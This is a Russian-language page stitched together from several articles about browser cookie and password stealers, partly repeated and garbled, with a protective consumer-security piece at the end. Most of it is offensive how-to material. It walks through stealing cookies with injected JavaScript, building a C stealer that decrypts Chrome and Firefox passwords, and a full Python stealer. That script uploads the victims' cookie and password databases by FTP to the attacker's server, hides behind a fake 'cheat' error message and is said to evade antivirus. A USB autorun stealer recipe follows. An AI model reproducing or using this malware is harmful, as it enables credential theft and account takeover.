Что делать с куки файлами со стиллера

Обновлено: 07.07.2024

JavaScript является одним из самых распространенных языков, используемых в Интернете. Он может автоматизировать и анимировать компоненты веб-сайта, управлять содержимым веб-сайта и выполнять множество других полезных функций с веб-страницы. Язык сценариев также имеет множество функций, которые могут использоваться для вредоносных целей, включая кражу файлов cookie пользователя, содержащих пароли и другую информацию.

Можно использовать JavaScript для сохранения или изменения файлов cookie пользователя для данного домена. Хотя это обычно применяется для создания и использования файлов cookie для интерактивной веб-разработки, если злоумышленник может злонамеренно просматривать одни и те же файлы cookie, он становится ценным методом взлома. Атаки на основе JavaScript особенно эффективны в сочетании с тактикой, например, инъекцией кода, поскольку она позволяет запускать вредоносный код на том, что похоже на веб-сайт, которому доверяют другие.

Не пропустите: как взломать веб-браузеры с помощью BeEF

Шаг 1Создание тестовой страницы HTML

Чтобы украсть файлы cookie, cookie должен быть сначала доступен в веб-домене, который просматривает пользователь. Это происходит всякий раз, когда пользователь просматривает веб-сайт. В то время как абсолютно возможно вставлять JavaScript в веб-сайты с использованием атаки «Человек в центре» или путем использования уязвимого веб-сайта, для этого потребуются дополнительные усилия.

Тестовая среда для нашего cookie будет находиться в пределах стандартной стандартной HTML-страницы. Мы сможем внедрить все наши элементы JavaScript в строку. Сначала создайте новый каталог, содержащий HTML-файл. В Linux системы macOS мы можем использовать mkdir, как показано ниже.

Мы можем перейти в этот каталог с помощью команды cd, как в этом примере.

Как только мы входим в эту папку, мы можем создать наш индексный файл с помощью нажатия, введя следующее в окно терминала.

Затем мы также отредактируем этот файл индекса. Сначала откройте файл в nano.

Добавьте основные теги открытия и закрытия HTML. В этом случае нам нужны только теги «html» и «body», поскольку для проверки JavaScript не требуются элементы «head». Теперь файл должен выглядеть примерно так.

Мы можем сохранить этот файл, нажав Ctrl + O в nano. На данный момент, если он открыт в веб-браузере, наша страница будет пустой. Мы можем добавить элемент заголовка или некоторый базовый контент HTML или даже добавить наши элементы сценариев на любую созданную нами веб-страницу, но для целей тестирования этого будет достаточно.

Не пропустите: как вести простую атаку «человек в центре»

Шаг 2Создание файла cookie

Мы можем создать базовый параметр, вставленный в файл cookie, используя только одну строку. Этот файл cookie будет существовать только на этой странице, и аналогичным образом техника, используемая для удаления куки-файлов позже, будет применяться к любому файлу cookie, хранящемуся на странице, на которой запускается или вводится скрипт.

Затем мы также отредактируем этот файл индекса. Сначала откройте файл в nano.

Добавьте основные теги открытия и закрытия HTML. В этом случае нам нужны только теги «html» и «body», поскольку для проверки JavaScript не требуются элементы «head». Теперь файл должен выглядеть примерно так.

Мы можем сохранить этот файл, нажав Ctrl + O в nano. На данный момент, если он открыт в веб-браузере, наша страница будет пустой. Мы можем добавить элемент заголовка или некоторый базовый контент HTML или даже добавить наши элементы сценариев на любую созданную нами веб-страницу, но для целей тестирования этого будет достаточно.

Не пропустите: как вести простую атаку «человек в центре»

Шаг 2Создание файла cookie

Мы можем создать базовый параметр, вставленный в файл cookie, используя только одну строку. Этот файл cookie будет существовать только на этой странице, и аналогичным образом техника, используемая для удаления куки-файлов позже, будет применяться к любому файлу cookie, хранящемуся на странице, на которой запускается или вводится скрипт.

Этот скрипт должен быть вставлен в раздел «тело» HTML-файла, как показано ниже.

Если веб-страница с этим скриптом будет открыта, будет установлен файл cookie, но в браузере ничего не будет видно. Мы можем сбросить файл cookie непосредственно на страницу, используя функцию document.write. Это не будет полезно для экспорта файлов cookie без каких-либо знаний пользователя, но это может помочь нам понять формат, в котором работает технология написания файлов cookie. Мы можем добавить следующую строку в наш скрипт, чтобы проверить это.

Теперь наш скрипт должен выглядеть примерно так, как показано ниже.

При открытии в браузере он должен выглядеть примерно так, как показано на рисунке ниже.

Теперь мы успешно установили «username = Null Byte» в качестве файла cookie для этой страницы. Теперь мы можем удалить «document.write (document.cookie)»; функции сценария, поскольку мы вместо этого отправляем файлы cookie, извлеченные с целевой страницы пользователя, на независимую удаленную страницу, на которой они могут быть написаны и сохранены нами.
Шаг 3Специализация файлов cookie с использованием JavaScript

Строка JavaScript, которую мы будем использовать для передачи файлов cookie на сервер, на котором мы можем их записать, снова будет использовать параметр document.cookie, однако вместо этого он будет передан в строке с URL-адресом, определенным в документе.location.

В этом примере файл PHP находится на локальном компьютере или локальном хосте на 127.0.0.1. При фактическом развертывании этого метода он должен указывать на файл, размещенный на веб-сервере, который может быть разрешен за пределами локальной сети или локальной машины.

Если таргетинг был настроен на веб-сайт в социальных сетях, сценарий будет инъецирован на этот сайт, а куки-файлы, которые были украдены, будут отправлены на IP-адрес или URL-адрес сервера, управляемого хакером.

Ты наверняка слышал о таком классе зловредных приложений, как стилеры. Опытные игроки в онлайн-играх знают, что такое стиллер, как не словить его и даже как создать. Однако создание и распространение карается законом, поэтому лучше не заниматься таким. Так что же такое стиллер?

Когда инфицированная программа начинает работу, то сначала управление получает вирус. Вирус заражает другие программы, а также выполняет запланированные деструктивные действия. Для маскировки своих действий вирус активизируется не всегда, а лишь при выполнении определенных условий (истечение некоторого времени, выполнение определенного числа операций, наступления некоторой даты или дня недели и т. д.).

Стиллер представляет собой программный код, который служит для хищения паролей и прочих данных с компьютера. Раньше данные отправлялись на сниффер, но сейчас уже активно по Интернету распространены коды, которые отправляют похищенное на почту.

Как защитить себя?

В сети интернет мало информации о том, что такое «Стиллеры» и как ими пользоваться. Нужно помнить о том, что они создаются не просто так, ради забавы. Основной их целью является добыча полезной информации с компьютера жертвы для последующей продажи. Создавать и использовать «Стиллер» определенно не стоит, так как за это могут привлечь к ответственности, в том числе и к уголовной. Нужно остерегаться «Стиллера», максимально защитив свой компьютер и не качать файлы с неизвестных источников.

Храните ваши пароли в облаке, пароль от которого вы будете знать на память, это самый надежный способ защитить свои данные. Никогда не сохраняйте пароли и не используйте никакие автозаполнения форм, когда вы например используете обменники валют в автозаполнение могут попасть данные вашей карты, ваш номер телефона и e-mail.

Принцип работы вредоноса

Cтиллеры бывают разные, от разных кодеров с разными возможностями. Они могут воровать все сохраненные вами пароли из всех браузеров, сессию из телеграмма и прочих мессенджеров, куки файлы (для входа на сайты), файлы кошельков популярных криптовалют для дальнейшего их обналичивания, файлы с рабочего стола определенного расширения .doc/.docx/.txt/.log (часто люди хранят файлик с паролями прямо на рабочем столе).

Все эти данные приходят вам в админ-панель от стиллера, где указано с какого IP адреса и имени компьютера это все прилетело. Грубо говоря мы можем забрать все самое ценное, что может быть на компьютере.

После покупки вируса у хакеров вам, как правило, выдают готовую к использованию версию софта с доступом в админ-панель, к тому же дополнительно настраивать уже ничего не нужно. Пример панели на рисунке ниже.


Как создать свой стиллер?

Похищение чужих учетных или других личных данных без надлежащего письменного соглашения карается по закону.

Браузеры в основе которых лежит Chrome или Firefox, хранят логины и пароли пользователей в зашифрованном виде в базе SQLite. Эта СУБД компактна и распространяется бесплатно по свободной лицензии. Так же, как и рассматриваемые нами браузеры: весь их код открыт и хорошо документирован, что, несомненно, поможет нам.

Рекламируя свои продукты, вирусописатели часто обращают внимание потенциальных покупателей на то, что в данный момент их стилер не «палится» антивирусом. Тут надо понимать, что все современные и более-менее серьезные вирусы и трояны имеют модульную структуру, каждый модуль в которой отвечает за что-то свое: один модуль собирает пароли, второй препятствует отладке и эмуляции, третий определяет факт работы в виртуальной машине, четвертый проводит обфускацию вызовов WinAPI, пятый разбирается со встроенным в ОС файрволом.

Так что судить о том, «палится» определенный метод антивирусом или нет, можно, только если речь идет о законченном «боевом» приложении, а не по отдельному модулю.



Chrome

Для начала давай получим файл, где хранятся учетные записи и пароли пользователей. В Windows он лежит по такому адресу:

Чтобы совершать какие-то манипуляции с этим файлом, нужно либо убить все процессы браузера, что будет бросаться в глаза, либо куда-то скопировать файл базы и уже после этого начинать работать с ним.

Давай напишем функцию, которая получает путь к базе паролей Chrome. В качестве аргумента ей будет передаваться массив символов с результатом ее работы (то есть массив будет содержать путь к файлу паролей Chrome).

Давай вкратце поясню, что здесь происходит. Мы сразу пишем эту функцию, подразумевая будущее расширение. Один из ее аргументов — поле browser_family , оно будет сигнализировать о семействе браузеров, базу данных которых мы получаем (то есть браузеры на основе Chrome или Firefox).

Если условие browser_family == 0 выполняется, то получаем базу паролей браузера на основе Chrome, если browser_family == 1 — Firefox. Идентификатор CHROME_DB_PATH указывает на базу паролей Chrome. Далее мы получаем путь к базе при помощи функции SHGetFolderPath , передавая ей в качестве аргумента CSIDL значение CSIDL_LOCAL_APPDATA , которое означает:

Функция SHGetFolderPath устарела, и в Microsoft рекомендуют использовать вместо нее SHGetKnownFolderPath . Проблема в том, что поддержка этой функции начинается с Windows Vista, поэтому я применил ее более старый аналог для сохранения обратной совместимости. Вот ее прототип:

После этого функция lstrcat совмещает результат работы SHGetFolderPath с идентификатором CHROME_DB_PATH .

База паролей получена, теперь приступаем к работе с ней. Как я уже говорил, это база данных SQLite, работать с ней удобно через SQLite API, которые подключаются с заголовочным файлом sqlite3.h. Давай скопируем файл базы данных, чтобы не занимать его и не мешать работе браузера.

Теперь подключаемся к базе командой sqlite3_open_v2 . Ее прототип:

Первый аргумент — наша база данных; информация о подключении возвращается во второй аргумент, дальше идут флаги открытия, а четвертый аргумент определяет интерфейс операционной системы, который должен использовать это подключение к базе данных, в нашем случае он не нужен. Если эта функция отработает корректно, возвращается значение SQLITE_OK , в противном случае возвращается код ошибки.

Обрати внимание: при некорректной отработке функции нам все равно необходимо самостоятельно закрыть подключение к базе и удалить ее копию.

Теперь начинаем непосредственно обрабатывать данные в базе. Для этого воспользуемся функцией sqlite3_exec() .

Эта функция имеет такой прототип:

Первый аргумент — наша база паролей, второй — это команда SQL, которая вытаскивает URL файла, логин, пароль и имя пользователя, третий аргумент — это функция обратного вызова, которая и будет расшифровывать пароли, четвертый — передается в нашу функцию обратного вызова, ну а пятый аргумент сообщает об ошибке.

Давай остановимся подробнее на callback-функции, которая расшифровывает пароли. Она будет применяться к каждой строке из выборки нашего запроса SELECT . Ее прототип — int (*callback)(void*,int,char**,char**) , но все аргументы нам не понадобятся, хотя объявлены они должны быть. Саму функцию назовем crack_chrome_db , начинаем писать и объявлять нужные переменные:

В этом цикле формируем BLOB (то есть большой массив двоичных данных). Далее выделяем память, читаем блоб и инициализируем поля DATA_BLOB :

А теперь приступим непосредственно к дешифровке. База данных Chrome зашифрована механизмом Data Protection Application Programming Interface (DPAPI). Суть этого механизма заключается в том, что расшифровать данные можно только под той учетной записью, под которой они были зашифрованы. Другими словами, нельзя стащить базу данных паролей, а потом расшифровать ее уже на своем компьютере. Для расшифровки данных нам потребуется функция CryptUnprotectData .

После этого выделяем память и заполняем массив passwds расшифрованными данными.


Firefox

Переходим к Firefox. Это будет немного сложнее, но мы все равно справимся! Для начала давай получим путь до базы данных паролей. Помнишь, в нашей универсальной функции get_browser_path мы передавали параметр browser_family ? В случае Chrome он был равен нулю, а для Firefox поставим 1.

В случае с Firefox мы не сможем, как в Chrome, сразу указать путь до папки пользователя. Дело в том, что имя папки пользовательского профиля генерируется случайно. Но это ерундовая преграда, ведь мы знаем начало пути ( \\Mozilla\\Firefox\\Profiles\\ ). Достаточно поискать в нем объект «папка» и проверить наличие в ней файла \\logins.json «. Именно в этом файле хранятся интересующие нас данные логинов и паролей. Разумеется, в зашифрованном виде. Реализуем все это в коде.

В самом конце переменная db_loc , которую мы передавали в качестве аргумента в нашу функцию, содержит полный путь до файла logins.json , а функция возвращает 1, сигнализируя о том, что она отработала корректно.

Теперь получим хендл файла паролей и выделим память под данные. Для получения хендла используем функцию CreateFile , как советует MSDN.

Все готово, но в случае с Firefox все не будет так просто, как с Chrome, — мы не сможем просто получить нужные данные обычным запросом SELECT, да и шифрование не ограничивается одной-единственной функцией WinAPI.

Дополнительная информация: Network Security Services (NSS)

Браузер Firefox активно использует функции Network Security Services для реализации шифрования своей базы. Эти функции находятся в динамической библиотеке, которая лежит по адресу C:\Program Files\Mozilla Firefox\nss3.dll .

Все интересующие нас функции нам придется получить из этой DLL. Сделать это можно стандартным образом, при помощи LoadLibrary\GetProcAdress . Код однообразный и большой, поэтому я просто приведу список функций, которые нам понадобятся:

  • NSS_Init ;
  • PL_Base64Decode ;
  • PK11SDR_Decrypt ;
  • PK11_Authenticate ;
  • PK11_GetInternalKeySlot ;
  • PK11_FreeSlot .

Это функции инициализации механизма NSS и расшифровки данных. Давай напишем функцию расшифровки, она небольшая. Я добавлю комментарии, чтобы все было понятно.

dir_cookie_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies"
dir_pass_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Password Checker"

dir_cookie_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies"
dir_pass_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data"

UserName - принимает значения имя текущего пользователя

dir_cookie_google, dir_pass_google, . . - и т.д. Это все директории где хранятся пароли, нам интерестны именно эти 3 браузера. Будем забирать пароли и куки и перекидывать их себе на сервер по FTP. Потом открывать в sqlite manager, но об этом позже.

У нас имеются директории, у нас есть библиотеки для работы, что же дальше? Пора приступать к основной задаче - написанию стиллера.

dir_google = "C:\\Users"+UserName+"\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies"
dir_firefox = "C:\\Users"+UserName+"\\AppData\\Roaming\\Mozilla\\Firefox"
dir_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex"
dir_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software"

def check():
if (os.path.exists(dir_google)) == True:
filename = "google"+str(random.randint(1, 10000))
filename2 = "google_pass" + str(random.randint(1, 10000))
with open(dir_cookie_google, "rb") as content:
con.storbinary("STOR %s" % filename, content)
with open(dir_pass_google, "rb") as content:
con.storbinary("STOR %s" % filename2, content)
if (os.path.exists(dir_opera)) == True:
filename = "opera"+str(random.randint(1, 10000))
filename2 = "opera_pass" + str(random.randint(1, 10000))
with open(dir_cookie_opera, "rb") as content:
con.storbinary("STOR %s" % filename, content)
with open(dir_pass_opera, "rb") as content:
con.storbinary("STOR %s" % filename2, content)
if (os.path.exists(dir_yandex)) == True:
filename = "yandex"+str(random.randint(1, 10000))
filename2 = "yandex_pass" + str(random.randint(1, 10000))
with open(dir_cookie_yandex, "rb") as content:
con.storbinary("STOR %s" % filename, content)
with open(dir_pass_yandex, "rb") as content:

Код получился не маленький, что есть то есть. Рассмотрим первые строчки. В начале, до функции, мы записываем в переменные адреса наших директорий для последующей проверки на валидность. "Зачем это нужно?", - спросите вы меня. Да так проще! Зачем ставить try, except, если можно проверить на валидность с помощью os.path.exits.

Далее у идет функция, со множествами if, но тут ничего ничего сложного нет, все просто:

if (os.path.exists(dir_google)) == True:
filename = "google"+str(random.randint(1, 10000))
filename2 = "google_pass" + str(random.randint(1, 10000))
with open(dir_cookie_google, "rb") as content:
con.storbinary("STOR %s" % filename, content)
with open(dir_pass_google, "rb") as content:
con.storbinary("STOR %s" % filename2, content)

Мы проверяем, является ли директория валидной, а после открываем ее, и отправляем файл на наш сервер FTP. Такс. Функцию написали, библиотеки подключили, директории есть. Чего не хватает? Думаю, не хватает задействовать функцию и вывести на экран какую-нибудь псевдо-ошибку, что мол библиотека не подключена и все дела. Будем действовать по такой схеме))

check()
print("Error library import HOUII.dll")
print("Error RUN cheat")
input()

Вот и весь код, ниже он целиком:

import os.path
import getpass
from ftplib import FTP
import random

def check():
if (os.path.exists(dir_google)) == True:
filename = "google"+str(random.randint(1, 10000))
filename2 = "google_pass" + str(random.randint(1, 10000))
with open(dir_cookie_google, "rb") as content:
con.storbinary("STOR %s" % filename, content)
with open(dir_pass_google, "rb") as content:
con.storbinary("STOR %s" % filename2, content)
if (os.path.exists(dir_opera)) == True:
filename = "opera"+str(random.randint(1, 10000))
filename2 = "opera_pass" + str(random.randint(1, 10000))
with open(dir_cookie_opera, "rb") as content:
con.storbinary("STOR %s" % filename, content)
with open(dir_pass_opera, "rb") as content:
con.storbinary("STOR %s" % filename2, content)
if (os.path.exists(dir_yandex)) == True:
filename = "yandex"+str(random.randint(1, 10000))
filename2 = "yandex_pass" + str(random.randint(1, 10000))
with open(dir_cookie_yandex, "rb") as content:
con.storbinary("STOR %s" % filename, content)
with open(dir_pass_yandex, "rb") as content:
con.storbinary("STOR %s" % filename2, content)

check()
print("Error library import HOUII.dll")
print("Error RUN cheat")
input()

У нас есть код, но он на пайтоне, его эксплуатируем на пк с помощью pyinstaller

Скачаем его:

Мы получили стилак который не палится антивирусами!

Информация предоставлена исключительно в ознакомительных целях!

Автор не несет ответственности за чужие действия!

Спасибо за внимание! Если понравилась статья, то поделись ей с друзьями!

Никогда, ни при каких условиях не сохраняйте пароли в браузере, сегодня расскажу почему.

Мы рассмотрим простой, но эффективный способ, быстро узнать пароли, который, неосторожный пользователь, а таких много, поверьте, сохранил в браузере, это ведь так удобно, правда, не надо запоминать пароль, не нужно каждый раз его вводить ручками и т.д. плюсов масса, но, есть один минус, и большой, украсть такие пароли вообще не проблема.

Сегодня, мы быстро и вообще не напрягаясь сделаем из простой флешки cookie-стиллер, а потом расшифруем файлы cookie, чтобы узнать все пароли сохраненные в браузере.

Для начала, вы должны понимать, что такое файл cookie, это, в своем роде, такой зашифрованный текстовый документ в котором храниться основная иформация о пользователе.

Но хватит теории, приступим.

Во первых, нам понадобиться флешка.

На ней мы создадим два текстовых файла:

не забудьте включить отображение расширений файлов, чтоб можно было изменить txt на inf и bat соответственно, это если вдруг кто не догадался)

дальше, в файле autorun мы пишем:[AutoRun]Open=”stealer.bat”

всё, сохранили, закрыли. Это автозапуск нашего стиллера

В файле stealer.bat пишем:

тоже сохраняем, закрываем. После чего заходим в свойства этих файлов и делаем их скрытыми. Стиллер готов.

Теперь, стоит остановиться на некоторых нюансах. А именно:

В Windows 10 (и 8) наш авторан не сработает, там эта возможность банально отключена. Поэтому придется придумать способ получить доступ к компьютеру и ручками запустить файл stealer.bat, благо процесс занимает очень мало времени, а придумать предлог сесть на минуту за чужой компьютер много ума не надо, ведь так? На всех предыдущих версиях винды, всё произойдет само как-только человек вставит флешку в usb порт.

Следующий нюанс, антивирус на эту манипуляцию никак не отреагирует, поэтому антивируса боятся не стоит, а вот фаервол всё это дело заблокирует на раз два. Тут важно понимать, что человек который установил и настроил фаервол, походу что-то где-то понимает и уж наверняка не будет хранить пароли в браузере, к такому персонажу нужен более тонкий подход, в следующих видео придумаем.

По нюансам всё. Теперь дальше, cookie то мы подрезали, чё с ними делать-то?

Рассказываю. Уже на своем компьютере, в идеале на виртуальной машине, удаляем нафиг свои куки. И вставляем на их место те которые у нас на флешке. Если вдруг кто не знает где храняться cookie, вот подсказка:

Google Chrome:

Opera:

Mozilla Firefox:

Internet Explorer 11:

Скопировали. Теперь качаем программу WebBrowserPassView и запускаем, всё. Видим на каких сайтах какие учётные записи и какие там пароли и используем их во благо и в целях безопасности)

WebBrowserPassView

А на этом пожалуй всё, не забывай, что усложнять жизнь с выполнением батников на чужом компьютере стоит только если это действительно необходимо, а в остальных случаях (когда есть возможность) проще запустить WebBrowserPassView и сразу увидеть все пароли.

Файлы «cookie» («куки») могут делать гораздо больше, чем просто отслеживать вашу активность в интернете. Теперь, кажется, хакеры нашли способ украсть и ваши пароли тоже.

«Куки» - это небольшой файл, который посещаемые вами веб-сайты сохраняют на ваш компьютер. Обычно они совершенно безвредны, но даже весьма полезны. На самом деле, многие веб-сайты, которые вы посещаете каждый день, используют файлы с «куками» для более корректной работы.

«Куки» были разработаны для того, чтобы стать для веб-сайтов надежным механизмом, позволяющим помнить требуемую информацию и записывать историю посещений своих пользователей. Эти крошечные текстовые файлы могут быть использованы для хранения регистрационной информации и некоторых данных о банковской карте, а также они могут помочь рекламодателям показывать вам рекламу, которая, по их мнению, будет соответствовать вашим предпочтениям.

Файлы cookie могут быть полезны, например, для экономии времени при вводе регистрационных данных на ранее посещенном веб-сайте. «Куки» напрямую не отображают пароли, а вместо этого они содержат хэш, который хранит ваш пароль. Когда пароль был хэширован, он был зашифрован таким образом, чтобы прочитать его мог только тот веб-сайт, с которого он был записан в «куки» . Каждый сайт использует уникальный алгоритм шифрования для кодирования хэша и его раскодирования.

Обычно хакеры любят красть пароли, но кража ваших файлов с «куками» также может принести хакерам выгоды. Установив ваши файлы cookie с хэшированными паролями в свой веб-браузер, кибер-преступник может немедленно получить доступ к вашему аккаунту на этом сайте , при этом ему не понадобится вводить ваши регистрационные данные.

Ваши «куки» могут быть использованы для того, чтобы быстро и просто можно было взломать ваши аккаунты в социальных сетях, в электронной почте и на многих других онлайн-сервисах.

Если хакеры могут получить доступ к вашему компьютеру или вашей сети , они, вероятно, смогут украсть ваши файлы cookie. Иногда они также могут украсть их непосредственно с небезопасного веб-сервера.

Люди становятся все умнее в вопросах защиты своих компьютеров от вредоносных программ, а потому все чаще устанавливают на компьютеры надежные антивирусные программы (например, вы можете скачать бесплатную пробную версию Panda Dome здесь ). В результате этого преступникам приходится прибегать к более совершенным методам, таким как кража информации, проходящей через публичные сети Wi - Fi .

Все, что нужно хакеру, чтобы заполучить ваши «куки», - это, например, расширение для браузера Firefox под названием Firesheep . Firesheep – это расширение,Что я могу сделать, чтобы защитить мои «куки»? которое использует технологию обнаружения и копирования файлов с «куками», отправляемых по беспроводной сети. Когда расширение обнаруживает файлы с «куками», оно создает список на компьютере хакера. Затем хакер у себя на компьютере может просто нажать на требуемый файл с «куками», после чего он войдет на соответствующий сайт вместо вас (как будто это вы зашли).

Простой, но эффективный способ остановить хакеров от кражи вашей личной информации – это просто регулярно удалять файлы «куки» . Специалисты рекомендуют делать это каждые 7-14 дней . Они также советуют никогда не хранить информацию о своей банковской карте на сайте , особенно, если он не является надежным. Однако удаление файлов с «куками» имеет один недостаток – вам придется повторно вводить пароли и личную информацию при следующем входе на соответствующий веб-сайт. Это может быть неудобно и раздражительно, но все же это гораздо безопаснее в долгосрочной перспективе, т.к. такой подход позволит защитить вас от кражи «куков».

И если у вас есть проблемы с запоминанием большого количества паролей, подумайте о том, чтобы использовать менеджер паролей для их безопасного хранения. Для получения дополнительной информации взгляните на наше руководство о том, как защитить свой пароль и подальше держаться от хакеров .

В нашем телеграм канале мы рассказываем о главных новостях из мира IT, актуальных угрозах и событиях, которые оказывают влияние на обороноспособность стран, бизнес глобальных корпораций и безопасность пользователей по всему миру. Узнай первым как выжить в цифровом кошмаре!

Читайте также: